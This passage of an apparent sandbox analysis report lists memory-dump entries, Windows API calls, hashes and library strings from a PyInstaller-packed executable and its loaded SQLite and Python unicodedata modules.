                                                                                                                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFABD67D5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                              • API String ID: 438689982-272990098
                                                                                                                                                                                                                                              • Opcode ID: 9cbe160e30e237f4906a042bf25e86bf704ec8520060b0cc770f4883f574f888
                                                                                                                                                                                                                                              • Instruction ID: ee5c807a673c055b9acb5ac53063593eb5bf9704ca97a334c2fecfdda3946c94
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cbe160e30e237f4906a042bf25e86bf704ec8520060b0cc770f4883f574f888
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2D1E062F1978282EB288B15A474AB93B91FB55BD4F8841B2DEAD077C9DF3CE441C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 438689982-3727861699
                                                                                                                                                                                                                                              • Opcode ID: d34391e6d3d6271bf35f46571239bf28f8455564d61c842ce53984c41de6952a
                                                                                                                                                                                                                                              • Instruction ID: 10fec1c3843772dfadceff66acf1916a21d2ed3d357b901b0de5bbd1f344f221
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d34391e6d3d6271bf35f46571239bf28f8455564d61c842ce53984c41de6952a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1CE72B0C68586DB68CF19E460AA9B7A8FB88B48F954132DE5D47798DF3CD805C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memmove
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2162964266-3727861699
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                              • API String ID: 438689982-2063813899
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memmove
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 1283327689-3727861699
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F8FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F9055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF62C0F3FA9), ref: 00007FF62C0F906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetCurrentProcess.KERNEL32 ref: 00007FF62C0F8590
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: OpenProcessToken.ADVAPI32 ref: 00007FF62C0F85A3
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.ADVAPI32 ref: 00007FF62C0F85C8
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetLastError.KERNEL32 ref: 00007FF62C0F85D2
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: GetTokenInformation.ADVAPI32 ref: 00007FF62C0F8612
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF62C0F862E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8570: CloseHandle.KERNEL32 ref: 00007FF62C0F8646
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F916C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF62C0F3C55), ref: 00007FF62C0F9175
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B2D7
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B30D
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B33A
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B34B
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B35C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B377
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62C0F918F,?,00007FF62C0F3C55), ref: 00007FF62C0F2BA0
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62C0F1B99), ref: 00007FF62C0F2760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentSubtypeType_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$east_asian_width
                                                                                                                                                                                                                                              • API String ID: 1522575347-3913127203
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: not a numeric character
                                                                                                                                                                                                                                              • API String ID: 1034370217-2058156748
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: not a decimal
                                                                                                                                                                                                                                              • API String ID: 3750391552-3590249192
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$decimal
                                                                                                                                                                                                                                              • API String ID: 3876575403-2474051849
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$name
                                                                                                                                                                                                                                              • API String ID: 3876575403-4190364640
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                              • String ID: a unicode character$argument 1$numeric
                                                                                                                                                                                                                                              • API String ID: 3876575403-2385192657
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$mirrored
                                                                                                                                                                                                                                              • API String ID: 3979797681-4001128513
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$combining
                                                                                                                                                                                                                                              • API String ID: 3979797681-4202047184
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                                                                                                                                                                                                              • String ID: unicodedata._ucnhash_CAPI
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00007FFDFABFA0B5,?,?,?), ref: 00007FFDFABF98F0
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00007FFDFABFA0B5,?,?,?), ref: 00007FFDFABF9A37
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                                              • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD59A
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD5C4
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD5E2
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD617
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 438689982-2852464175
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
